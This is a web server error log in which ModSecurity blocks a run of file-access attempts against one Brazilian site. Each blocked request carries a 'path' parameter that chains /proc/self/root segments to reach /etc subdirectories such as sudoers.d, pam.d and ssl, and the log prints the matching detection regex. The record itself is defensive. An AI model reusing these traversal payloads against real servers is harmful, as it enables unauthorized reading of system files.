[Mon Mar 16 18:58:08.182992 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.241.46:60024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh88KTCbgAP5jq5TehM8gAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:58:09.907581 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:46456] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh88c_BxrYCr4hPDw8MfAAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:58:19.885059 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:46462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8-8_BxrYCr4hPDw8MhwAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:58:22.211764 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:44928] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh8_o6lpbStxTqkSkuKhQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:58:50.390850 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.241.46:44934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9GlajLEzk2WiQ-100oQAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:58:55.108603 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:44318] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9H0r9dMAiw-8KANNrTQAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:59:28.657670 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:44320] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9QNSswJuvopo3lOiChQAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:59:36.183605 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:59782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9SNSswJuvopo3lOiClAAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:59:48.446326 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.243.203:37782] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9VM_BxrYCr4hPDw8MygAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:59:49.436772 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.241.46:59796] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9VY6lpbStxTqkSkuK-QAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:00:04.987008 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.244.31:58020] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh9ZLABkC4fWIHEf8EahwAAAFc"]
[Mon Mar 16 19:00:37.151238 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.243.203:51008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9g7ysWC90G-1nBrBnxQAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 19:01:13.309254 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:34998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9qf9ocpUE4ed4uDwWAwAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:01:16.825350 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:45918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9rLABkC4fWIHEf8EbGwAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:01:18.109837 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.241.46:58576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9rkr9dMAiw-8KANNrZwAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:01:24.079577 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:58590] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9tLysWC90G-1nBrBn3AAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:01:35.394572 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.241.46:58598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9v0r9dMAiw-8KANNrdAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:01:37.962557 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:34642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9wUr9dMAiw-8KANNrdgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:01:40.550981 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:36088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9xLysWC90G-1nBrBn7QAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:01:41.326766 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.241.46:38230] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9xUr9dMAiw-8KANNregAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:01:44.735579 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.241.46:38242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9yKQpVkWug9HeOt9V6AAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:01:47.035480 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.241.46:38246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh9y8_BxrYCr4hPDw8M6gAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
